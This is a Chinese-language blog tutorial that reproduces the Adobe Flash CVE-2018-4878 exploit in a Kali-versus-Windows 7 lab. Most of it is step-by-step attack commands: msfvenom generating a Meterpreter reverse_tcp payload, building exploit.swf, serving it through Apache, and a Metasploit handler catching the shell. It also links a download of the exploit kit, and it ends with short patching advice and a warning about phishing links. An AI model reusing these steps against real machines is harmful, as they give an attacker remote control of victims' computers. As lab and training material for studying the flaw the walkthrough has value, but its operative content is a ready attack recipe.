2018年2月1號，Adobe官方發布安全通報（APSA18-01），聲明Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞（CVE-2018-4878）。

攻擊者通過構造特殊的Flash鏈接，當用戶用瀏覽器/郵件/Office訪問此Flash鏈接時，會被“遠程代碼執行”，並且直接被getshell。

直到2018年2月5號，Adboe才發布補丁來修復此0 day漏洞。

互聯網上出現的基於此Flash 0day漏洞進行攻擊的樣本，其實在2017年底就已經由韓國計算機應急小組（KR-CERT）首次發現。

目前，全網已經有比較成熟的針對此Flash漏洞的利用代碼，接下來，我們為大家復現整個過程。

2、漏洞復現環境

Kali Linux + Windows 7 sp1
滲透機：Kali Linux （ip：172.16.70.216）
靶機：Windows 7 sp1 （ip：172.16.70.199）
exp：cve-2018-4878.py
flash：flashplayer_activex_28.0.0.137.exe

註：此實驗環境所用滲透機和靶機，跟之前文章所分享一致。為了節省大家實驗時間，我將此實驗涉及到的工具全部上傳到網盤=>
鏈接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密碼:0li0

3、實驗流程

①將網盤中的CVE-2018-4878-master

目錄下載下來，並放入Kali Linux桌面

②使用msfvenom生成shell代碼

生成代碼，其中lhost為kali的ip地址，lport為自定義的端口號

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888 -f python>shellcode.txt

查看代碼文件
root@kali:~# cat shellcode.txt

③進入CVE-2018-4878-master目錄，編輯CVE-2018-4878.py文件

將上面msfvenom生成的代碼覆蓋掉原來的代碼：

修改CVE-2018-4878.py下面的文件信息（後面會用到，之後保存修改退出）：

④Kali Linux進入CVE-2018-4878-master路徑，用Python執行CVE-2018-4878-master.py代碼

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py
root@kali:~/Desktop/CVE-2018-4878-master# ls -l

⑤Kali Linux開啟Apache2服務，並將上面的2個文件放入/var/www/html目錄中（apache web路徑）

root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf

此時，Kali Linux上Web服務啟動，並且具備index2.html這個頁面。只要靶機啟用flash並訪問了這個頁面，則可以直接被控制。

⑥Kali Linux開啟Shell會話監聽

使用handler監聽模塊
msf > use exploit/multi/handler
回彈一個tcp連接
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
設置kali滲透機的ip地址
msf exploit(handler) > set lhost 172.16.70.216
設置監聽端口，這個需跟上面msfvenom設置的端口一致
msf exploit(handler) > set lport 8888
開啟監聽，等待肉雞上線
msf exploit(handler) > exploit

⑦Windows7 安裝flash插件，並用IE瀏覽器訪問頁面

搜索flash最新的28版本

安裝flash插件

使用Win7內置IE 8瀏覽器訪問頁面：http://172.16.70.216/index2.html

⑧Kali Linux 上獲取meterpreter shell，並進行管理

實驗總結：

可以看到，最終由於Flash存在CVE-2018-4878這個高危漏洞，導致Windows靶機訪問含flash的頁面時，直接被Kali Linux控制。

真實環境下，很多黑客基於此Flash漏洞，結合社會工程學，例如將網頁鏈接放置在誘導郵件中，欺騙大量用戶點擊，來達到最規模攻擊效果。

在這裏也呼籲大家：平常要非常小心陌生鏈接，類似這種“一點就中招”的高級滲透攻擊，肯定還有很多沒有浮出水面。像這個2017年其實已經出現的漏洞，早就有黑客已經在使用了，而中招者完全不知情，整個攻擊手法非常隱蔽。而2018年2月才有安全補丁，在這期間，有多少肉雞被控制，這個難以想象。很多0day漏洞，黑客比大部分人都要提前知曉，在安全廠商沒有出安全公告，或者沒有打安全補丁的情況下，一個不小心，就會導致電腦被劫持，數據被竊取，造成極大的損失。

4、漏洞修復

①直接到Adobe Flash官網，下載最新版本：https://get.adobe.com/cn/flashplayer/
②安裝常見殺毒軟件，開啟實時防護和殺毒引擎實時升級。

相關推文：

[漏洞復現] MS17-010 基於"永恒之藍"實現Windows Getshell

[漏洞復現] CVE-2017-11882 通殺所有Office版本

[漏洞復現] CVE-2017-16995 Ubuntu16.04

[漏洞復現] CVE-2018-4878 Flash 0day